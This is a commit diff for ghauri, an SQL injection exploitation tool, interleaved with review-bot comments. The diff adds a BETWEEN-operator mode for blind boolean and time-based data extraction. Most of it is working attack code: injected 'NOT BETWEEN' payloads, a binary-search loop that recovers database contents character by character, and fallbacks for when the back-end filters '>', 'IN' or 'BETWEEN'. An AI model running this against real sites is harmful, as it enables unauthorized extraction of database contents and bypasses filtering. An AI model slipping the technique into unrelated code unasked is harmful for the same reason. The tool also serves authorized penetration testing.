  • added switch '--fetch-using=between' for between and in based operator for data retrieval, updated code quality fixed issue with custom marker detection when no level is provided

  • r0oth3x49 committed 1 year ago
    95d53fb4
    1 parent 3c96dbf0
  • ■ ■ ■ ■
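--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-[![GitHub release](https://img.shields.io/badge/release-v1.1.6-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.1.6)
+[![GitHub release](https://img.shields.io/badge/release-v1.1.7-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.1.7)
 [![GitHub stars](https://img.shields.io/github/stars/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/stargazers)
 [![GitHub forks](https://img.shields.io/github/forks/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/network)
 [![GitHub issues](https://img.shields.io/github/issues/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/issues)
@@ -92,6 +92,7 @@
  --delay Delay in seconds between each HTTP request
  --timeout Seconds to wait before timeout connection (default 30)
  --retries Retries when the connection related error occurs (default 3)
+ --confirm Confirm the injected payloads.
  --skip-urlencode Skip URL encoding of payload data
  --force-ssl Force usage of SSL/HTTPS
 
@@ -108,6 +109,8 @@
  --dbms DBMS Force back-end DBMS to provided value
  --prefix Injection payload prefix string
  --suffix Injection payload suffix string
+ --safe-chars Skip URL encoding of specific character(s): (e.g:- --safe-chars="[]")
+ --fetch-using Fetch data using different operator(s): (e.g: --fetch-using=between/in)
 
 Detection:
  These options can be used to customize the detection phase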
  • ■ ■ ■ ■
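--- a/ghauri/__init__.py
+++ b/ghauri/__init__.py
@@ -24,7 +24,7 @@
 
 """
 
-__version__ = "1.1.6"
+__version__ = "1.1.7"
 __author__ = "Nasir Khan (r0ot h3x49)"
 __license__ = "MIT"
 __copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"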
  • ■ ■ ■ ■ ■
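--- a/ghauri/common/config.py
+++ b/ghauri/common/config.py
@@ -96,6 +96,7 @@
  self.confirm_payloads = False
  self.safe_chars = None
  self.rto_warning = False
+ self.fetch_using = None
  self.rtom_warning = False
 
  @property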
  • ■ ■ ■ ■ ■ ■
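--- a/ghauri/common/utils.py
+++ b/ghauri/common/utils.py
@@ -1424,21 +1424,26 @@
  return conf._json_post_data
 
 
-def check_injection_points_for_level(level, injection_points):
+def check_injection_points_for_level(level, obj):
  is_ok = False
+ custom_injection_in = obj.custom_injection_in
+ injection_points = obj.injection_point
  GET = injection_points.get("GET", [])
  POST = injection_points.get("POST", [])
  COOKIES = injection_points.get("COOKIE", [])
  HEADERS = injection_points.get("HEADER", [])
- if level == 1:
- if GET or POST:
- is_ok = True
- if level == 2:
- if GET or POST or COOKIES:
- is_ok = True
- if level == 3:
- if GET or POST or COOKIES or HEADERS:
- is_ok = True
+ if custom_injection_in:
+ is_ok = True
+ else:
+ if level == 1:
+ if GET or POST:
+ is_ok = True
+ if level == 2:
+ if GET or POST or COOKIES:
+ is_ok = True
+ if level == 3:
+ if GET or POST or COOKIES or HEADERS:
+ is_ok = True
  return is_ok
 
 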
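Review bot: `check_injection_points_for_level` now takes an object instead of the `injection_points` dict and reads `obj.custom_injection_in` and `obj.injection_point`, but nothing in the function states this, and a caller that still passes the dict would raise `AttributeError` instead of returning `False`. A short docstring saying that `obj` must expose those two attributes, and that a custom injection marker makes the check pass regardless of `level`, would document the new contract. The `else:` wrapping three independent `if level == N:` tests could be flattened into `elif level == 1 and (GET or POST):` and so on, which avoids the extra nesting this change introduces. The only call site visible on this page (ghauri/ghauri.py) is updated; any other callers are outside the diff.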
  • ■ ■ ■ ■ ■ ■
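--- a/ghauri/core/extract.py
+++ b/ghauri/core/extract.py
@@ -98,11 +98,19 @@
  ):
  GuessUsing = collections.namedtuple(
  "GuessUsing",
- ["ok", "binary_search", "in_based_search", "linear_search", "msg"],
+ [
+ "ok",
+ "binary_search",
+ "in_based_search",
+ "linear_search",
+ "between_based_search",
+ "msg",
+ ],
  )
  binary_search = False
  in_based_search = False
  linear_search = False
+ between_based_search = False
  retry_on_error = 0
  http_firewall_code_counter = 0
  timesec = conf.timesec
@@ -112,6 +120,7 @@
  binary_search=binary_search,
  in_based_search=in_based_search,
  linear_search=linear_search,
+ between_based_search=between_based_search,
  msg=None,
  )
  expressions = [
@@ -123,6 +132,12 @@
  },
  {
  "expression": vector.replace(
+ "[INFERENCE]", "6590 NOT BETWEEN 0 AND 6420"
+ ).replace("[SLEEPTIME]", f"{timesec}"),
+ "type": "between_based_search",
+ },
+ {
+ "expression": vector.replace(
  "[INFERENCE]", "(SELECT(45))IN(10,45,60)"
  ).replace("[SLEEPTIME]", f"{timesec}"),
  "type": "in_based_search",
@@ -135,11 +150,64 @@
  },
  ]
  start = 0
+ operators = {
+ "greater": "binary_search",
+ "between": "between_based_search",
+ "in": "in_based_search",
+ "equal": "linear_search",
+ }
+ operator = None
+ if conf.fetch_using and conf.fetch_using in list(operators.keys()):
+ operator = operators.get(conf.fetch_using, None)
+ if operator:
+ logger.debug(
+ f"Ghauri will based data retrieval using '{conf.fetch_using}' openator"
+ )
+ # if conf.fetch_using == "in":
+ # _temp = GuessUsing(
+ # ok=True,
+ # binary_search=binary_search,
+ # in_based_search=True,
+ # linear_search=linear_search,
+ # between_based_search=between_based_search,
+ # msg="",
+ # )
+ # if conf.fetch_using == "binary":
+ # _temp = GuessUsing(
+ # ok=True,
+ # binary_search=True,
+ # in_based_search=in_based_search,
+ # linear_search=linear_search,
+ # between_based_search=between_based_search,
+ # msg="",
+ # )
+ # if conf.fetch_using == "between":
+ # _temp = GuessUsing(
+ # ok=True,
+ # binary_search=binary_search,
+ # in_based_search=in_based_search,
+ # linear_search=linear_search,
+ # between_based_search=True,
+ # msg="",
+ # )
+ # if conf.fetch_using == "equal":
+ # _temp = GuessUsing(
+ # ok=True,
+ # binary_search=binary_search,
+ # in_based_search=in_based_search,
+ # linear_search=True,
+ # between_based_search=between_based_search,
+ # msg="",
+ # )
+ # return _temp
  end = len(expressions)
  while start < end:
  entry = expressions[start]
  expression = entry.get("expression")
  _type = entry.get("type")
+ if operator and _type != operator:
+ start += 1
+ continue
  logger.payload(f"{expression}")
  # if http_firewall_code_counter > 2:
  # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
@@ -155,19 +223,20 @@
  # exit(0)
  # if choice == "c":
  # http_firewall_code_counter = 0
- # if retry_on_error >= retry:
- # logger.warning(f"Ghauri detected connection errors multiple times")
- # choice = logger.read_input(
- # f"how do you want to proceed? [(C)continue/(q)uit] ",
- # batch=False,
- # user_input="C",
- # )
- # if choice == "q":
- # logger.error("user quit")
- # logger.end("ending")
- # exit(0)
- # if choice == "c":
- # retry_on_error = 0
+ if retry_on_error >= conf.retry:
+ start += 1
+ # logger.warning(f"Ghauri detected connection errors multiple times")
+ # choice = logger.read_input(
+ # f"how do you want to proceed? [(C)continue/(q)uit] ",
+ # batch=False,
+ # user_input="C",
+ # )
+ # if choice == "q":
+ # logger.error("user quit")
+ # logger.end("ending")
+ # exit(0)
+ # if choice == "c":
+ # retry_on_error = 0
  if delay > 0:
  time.sleep(delay)
  try:
@@ -210,23 +279,48 @@
  binary_search=True,
  in_based_search=in_based_search,
  linear_search=linear_search,
+ between_based_search=between_based_search,
  msg="",
  )
+ if _type == "between_based_search":
+ msg = "it appears that the character '>' is filtered by the back-end server. ghauri will based data retrieval on BETWEEN operator"
+ if conf.fetch_using:
+ msg = ""
+ _temp = GuessUsing(
+ ok=True,
+ binary_search=binary_search,
+ in_based_search=in_based_search,
+ linear_search=linear_search,
+ between_based_search=True,
+ msg=msg,
+ )
  if _type == "in_based_search":
+ msg = (
+ "it appears that the character '>' and 'BETWEEN' operator is filtered by the back-end server. ghauri will based data retrieval on IN() operator",
+ )
+ if conf.fetch_using:
+ msg = ""
  _temp = GuessUsing(
  ok=True,
  binary_search=binary_search,
  in_based_search=True,
  linear_search=linear_search,
- msg="it appears that the character '>' is filtered by the back-end server. ghauri will based data retrieval on IN() function",
+ between_based_search=between_based_search,
+ msg=msg,
  )
  if _type == "linear_search":
+ msg = (
+ "it appears that the character '>' and the operator(s) 'IN, BETWEEN' are filtered by the back-end server. ghauri will based data retrieval on '=' operator, You are advised to use --delay=3 in this case",
+ )
+ if conf.fetch_using:
+ msg = ""
  _temp = GuessUsing(
  ok=True,
  binary_search=binary_search,
  in_based_search=in_based_search,
  linear_search=True,
- msg="it appears that the character '>' and function 'IN' both are filtered by the back-end server. ghauri will based data retrieval on '=' operator, You are advised to use --delay=3 in this case",
+ between_based_search=between_based_search,
+ msg=msg,
  )
  break
  if vector_type == "time_vector":
@@ -238,23 +332,48 @@
  binary_search=True,
  in_based_search=in_based_search,
  linear_search=linear_search,
- msg=None,
+ between_based_search=between_based_search,
+ msg="",
+ )
+ if _type == "between_based_search":
+ msg = "it appears that the character '>' is filtered by the back-end server. ghauri will based data retrieval on BETWEEN operator"
+ if conf.fetch_using:
+ msg = ""
+ _temp = GuessUsing(
+ ok=True,
+ binary_search=binary_search,
+ in_based_search=in_based_search,
+ linear_search=linear_search,
+ between_based_search=True,
+ msg=msg,
  )
  if _type == "in_based_search":
+ msg = (
+ "it appears that the character '>' and 'BETWEEN' operator is filtered by the back-end server. ghauri will based data retrieval on IN() operator",
+ )
+ if conf.fetch_using:
+ msg = ""
  _temp = GuessUsing(
  ok=True,
  binary_search=binary_search,
  in_based_search=True,
  linear_search=linear_search,
- msg="it appears that the character '>' is filtered by the back-end server. ghauri will based data retrieval on IN() function",
+ between_based_search=between_based_search,
+ msg=msg,
  )
  if _type == "linear_search":
+ msg = (
+ "it appears that the character '>' and the operator(s) 'IN, BETWEEN' are filtered by the back-end server. ghauri will based data retrieval on '=' operator, You are advised to use --delay=3 in this case",
+ )
+ if conf.fetch_using:
+ msg = ""
  _temp = GuessUsing(
  ok=True,
  binary_search=binary_search,
  in_based_search=in_based_search,
  linear_search=True,
- msg="it appears that the character '>' and function 'IN' both are filtered by the back-end server. ghauri will based data retrieval on '=' operator, You are advised to use --delay=3 in this case",
+ between_based_search=between_based_search,
+ msg=msg,
  )
  break
  start += 1
@@ -676,6 +795,193 @@
  retry_on_error += 1
  return character
 
+ def _search_using_between_operator(
+ self,
+ url,
+ data,
+ vector,
+ parameter,
+ headers,
+ base,
+ injection_type,
+ delay=0,
+ timesec=5,
+ timeout=30,
+ proxy=None,
+ attack01=None,
+ code=None,
+ match_string=None,
+ not_match_string=None,
+ text_only=False,
+ is_multipart=False,
+ suppress_output=False,
+ query_check=False,
+ minimum=None,
+ maximum=None,
+ offset=0,
+ expression_payload=None,
+ queryable=None,
+ chars="",
+ vector_type=None,
+ retry=3,
+ *args,
+ **kwargs,
+ ):
+ # need to implement retry mechanism in case of http connection related errors..
+ if not minimum:
+ minimum = 32
+ if not maximum:
+ maximum = 127
+ ascii_char = 0
+ is_found = False
+ character = ""
+ http_firewall_code_counter = 0
+ error_msg = None
+ retry_on_error = 0
+ if not conf.threads:
+ logger.progress(f"retrieved: {chars}")
+ if conf.threads:
+ chars = "".join(
+ [
+ str(i)
+ for i in collections.OrderedDict(
+ sorted(conf._thread_chars_query.items())
+ ).values()
+ ]
+ )
+ logger.progress(f"retrieved: {chars}")
+ sleep_time = conf.timesec
+ while not is_found:
+ if conf._readtimout_counter >= 3:
+ if conf.rto_warning:
+ if not conf.rtom_warning:
+ choice = logger.read_input(
+ "Ghauri detected read timeout multiple time(s). Do you want to continue? [y/N] "
+ )
+ if choice == "n":
+ logger.end("ending")
+ exit(0)
+ conf.rtom_warning = True
+ if not conf.rto_warning:
+ msgrto = ""
+ if vector_type == "time_vector":
+ msgrto = ", It is recommended to set high value of option(s) '--time-sec', increase delay between request(s) with an option '--delay'"
+ if vector_type == "boolean_vector":
+ msgrto = ", It is recommended to set high value of option(s) '--timeout' and also increase delay between each http request with an option '--delay'"
+ logger.warning(
+ f"Ghauri detected read timout '{conf._readtimout_counter}' time(s){msgrto}."
+ )
+ conf.rto_warning = True
+ conf._readtimout_counter = 0
+ if delay > 0:
+ time.sleep(delay)
+ ascii_char = int((minimum + maximum) / 2)
+ if (minimum == ascii_char) & (maximum == ascii_char):
+ is_found = True
+ character = str(chr(ascii_char))
+ if not conf.threads:
+ logger.progress(f"retrieved: {chars}{character}")
+ if conf.threads:
+ conf._thread_chars_query.update({offset: character})
+ chars = "".join(
+ [
+ str(i)
+ for i in collections.OrderedDict(
+ conf._thread_chars_query.items()
+ ).values()
+ ]
+ )
+ logger.progress(f"retrieved: {chars}")
+ break
+ condition = expression_payload.format(
+ query=queryable, position=offset, char=ascii_char
+ )
+ condition = replace_with(
+ string=condition, character="=", replace_with=" NOT BETWEEN 0 AND "
+ )
+ expression = vector.replace("[INFERENCE]", f"{condition}").replace(
+ "[SLEEPTIME]", f"{sleep_time}"
+ )
+ logger.payload(f"{expression}")
+ try:
+ attack = inject_expression(
+ url=url,
+ data=data,
+ proxy=proxy,
+ delay=delay,
+ timesec=timesec,
+ timeout=timeout,
+ headers=headers,
+ parameter=parameter,
+ expression=expression,
+ is_multipart=is_multipart,
+ injection_type=injection_type,
+ )
+ response_time = attack.response_time
+ logger.debug(
+ f"sleep time: {sleep_time}, response time: {response_time}"
+ )
+ if attack01 and vector_type == "boolean_vector":
+ bool_retval = check_boolean_responses(
+ base,
+ attack,
+ attack01,
+ code=code,
+ match_string=match_string,
+ not_match_string=not_match_string,
+ text_only=text_only,
+ )
+ result = bool_retval.vulnerable
+ if result:
+ minimum = ascii_char + 1
+ maximum = maximum
+ else:
+ minimum = minimum
+ maximum = ascii_char
+ if vector_type == "time_vector":
+ if response_time >= sleep_time:
+ minimum = ascii_char + 1
+ maximum = maximum
+ else:
+ minimum = minimum
+ maximum = ascii_char
+ except KeyboardInterrupt as error:
+ if conf.threads:
+ raise error
+ logger.warning("user aborted during data extraction phase")
+ quest = logger.read_input(
+ "how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ",
+ batch=False,
+ user_input="C",
+ )
+ if quest and quest == "e":
+ raise error
+ if quest and quest == "q":
+ logger.error("user quit")
+ logger.end("ending")
+ exit(0)
+ except ConnectionAbortedError as e:
+ logger.critical(
+ f"connection attempt to the target URL was aborted by the peer, Ghauri is going to retry"
+ )
+ retry_on_error += 1
+ except ConnectionRefusedError as e:
+ logger.critical(
+ f"connection attempt to the target URL was refused by the peer. Ghauri is going to retry"
+ )
+ retry_on_error += 1
+ except ConnectionResetError as e:
+ logger.critical(
+ f"connection attempt to the target URL was reset by the peer. Ghauri is going to retry"
+ )
+ retry_on_error += 1
+ except Exception as error:
+ logger.critical(
+ f"error {error}, during detection phase. Ghauri is going to retry"
+ )
+ retry_on_error += 1
+ return character
+
  def _binary_search(
  self,
  url,
@@ -1690,6 +1996,7 @@
  binary_search = False
  in_based_search = False
  linear_search = False
+ between_based_search = False
  is_resumed = False
  start_pos = 1
  start_chars = ""
@@ -1787,6 +2094,7 @@
  binary_search = retval_check.binary_search
  in_based_search = retval_check.in_based_search
  linear_search = retval_check.linear_search
+ between_based_search = retval_check.between_based_search
  if not retval_check.ok:
  logger.critical(
  "ghauri will not be able to extract data as '=', 'IN' and '>' all are filtered by back-end server.."
@@ -1801,7 +2109,12 @@
  chars = start_chars
  pos = start_pos
  total_length = length + 1
- if conf.threads and not binary_search and not in_based_search:
+ if (
+ conf.threads
+ and not binary_search
+ and not in_based_search
+ and not between_based_search
+ ):
  logger.debug(
  "Ghauri will use a fallback leaner search to guess character(s), adjusting threads to 1"
  )
@@ -1841,8 +2154,10 @@
  exfiltration_func = self._binary_search
  if in_based_search:
  exfiltration_func = self._search_using_in_operator
- # if linear_search:
- # exfiltration_func = self._linear_search
+ if between_based_search:
+ exfiltration_func = (
+ self._search_using_between_operator
+ )
  exec_map = {
  ex.submit(
  exfiltration_func,
@@ -1990,6 +2305,74 @@
  )
  bool_invalid_character_counter += 1
  binary_search = False
+ between_based_search = True
+ in_based_search = False
+ linear_search = False
+ if is_valid:
+ pos += 1
+ chars += retval
+ elif between_based_search:
+ retval = (
+ self._search_using_between_operator(
+ url=url,
+ data=data,
+ vector=vector,
+ parameter=parameter,
+ headers=headers,
+ base=base,
+ injection_type=injection_type,
+ delay=delay,
+ timesec=timesec,
+ timeout=timeout,
+ proxy=proxy,
+ attack01=attack01,
+ code=code,
+ match_string=match_string,
+ not_match_string=not_match_string,
+ is_multipart=is_multipart,
+ suppress_output=suppress_output,
+ query_check=query_check,
+ minimum=32,
+ maximum=127,
+ offset=pos,
+ expression_payload=value,
+ queryable=entry,
+ chars=chars,
+ text_only=text_only,
+ vector_type=vector_type,
+ )
+ )
+ if retval:
+ is_valid = self.validate_character(
+ url=url,
+ data=data,
+ vector=vector,
+ parameter=parameter,
+ headers=headers,
+ base=base,
+ injection_type=injection_type,
+ proxy=proxy,
+ is_multipart=is_multipart,
+ timeout=timeout,
+ delay=delay,
+ timesec=timesec,
+ identified_character=retval,
+ vector_type=vector_type,
+ offset=pos,
+ expression_payload=value,
+ queryable=entry,
+ code=code,
+ match_string=match_string,
+ not_match_string=not_match_string,
+ attack01=attack01,
+ )
+ if not is_valid:
+ logger.warning(
+ "invalid character detected, retrying."
+ )
+ bool_invalid_character_counter += 1
+ binary_search = False
+ between_based_search = False
  in_based_search = True
  linear_search = False
  if is_valid: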
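Review bot: In the new `in_based_search` and `linear_search` branches, in both the boolean and the time-vector blocks, `msg = ("…",)` carries a trailing comma inside the parentheses, so `msg` is a one-element tuple and `GuessUsing.msg` is no longer a string as it is in the `between_based_search` branch; dropping the comma, `msg = "it appears that …"`, restores the type. Separately, `_search_using_between_operator` increments `retry_on_error` in every `except` arm but never compares it with its `retry` parameter, so a host that keeps refusing or resetting connections is requested again without limit, which the comment at the top of the function acknowledges. A guard at the start of the `while` loop such as `if retry_on_error >= retry: break` would bound the traffic sent to the system under test. The debug message also misspells "operator" as `openator`.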
  • ■ ■ ■ ■ ■
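--- a/ghauri/ghauri.py
+++ b/ghauri/ghauri.py
@@ -87,6 +87,7 @@
  threads=None,
  confirm_payloads=False,
  safe_chars=None,
+ fetch_using=None,
 ):
  verbose_levels = {
  1: logging.INFO,
@@ -100,6 +101,7 @@
  conf.confirm_payloads = confirm_payloads
  conf.safe_chars = safe_chars
  conf.timesec = timesec
+ conf.fetch_using = fetch_using
  logger.start("starting")
  if not force_ssl:
  ssl._create_default_https_context = ssl._create_unverified_context
@@ -198,7 +200,7 @@
  conf.filepaths = filepaths
  filepath = os.path.dirname(filepaths.logs)
  set_level(verbose_level, filepaths.logs)
- is_params_found = check_injection_points_for_level(level, injection_points)
+ is_params_found = check_injection_points_for_level(level, obj)
  if not is_params_found:
  logger.critical(
  "no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')"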
  • ■ ■ ■ ■ ■
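--- a/ghauri/scripts/ghauri.py
+++ b/ghauri/scripts/ghauri.py
@@ -243,7 +243,15 @@
  "--safe-chars",
  dest="safe_chars",
  type=str,
- help='Skip URL encoding of specific character(s): (e.g:- --safe-chars="[]"',
+ help='Skip URL encoding of specific character(s): (e.g:- --safe-chars="[]")',
+ default=None,
+ metavar="",
+ )
+ injection.add_argument(
+ "--fetch-using",
+ dest="fetch_using",
+ type=str,
+ help="Fetch data using different operator(s): (e.g: --fetch-using=between/in)",
  default=None,
  metavar="",
  )
@@ -446,6 +454,7 @@
  threads=args.threads,
  confirm_payloads=args.confirm_payloads,
  safe_chars=args.safe_chars,
+ fetch_using=args.fetch_using,
  )
  if resp.is_injected:
  target = ghauri.Ghauri(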
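Review bot: `--fetch-using` is declared with `type=str` and no `choices=`, so a misspelt or differently cased value is accepted and, judging by the `conf.fetch_using in list(operators.keys())` test in ghauri/core/extract.py, silently ignored in favour of automatic operator selection. Adding `choices=["greater", "between", "in", "equal"]`, the keys of that `operators` dict, lets argparse reject unknown values up front. The help text lists only `between/in`, although `greater` and `equal` are accepted as well.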
  • ■ ■ ■ ■
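--- a/setup.py
+++ b/setup.py
@@ -5,7 +5,7 @@
 
 setup(
  name="ghauri",
- version="1.1.6",
+ version="1.1.7",
  description="An advanced SQL injection detection & exploitation tool.",
  classifiers=["Programming Language :: Python3"],
  author="Nasir Khan",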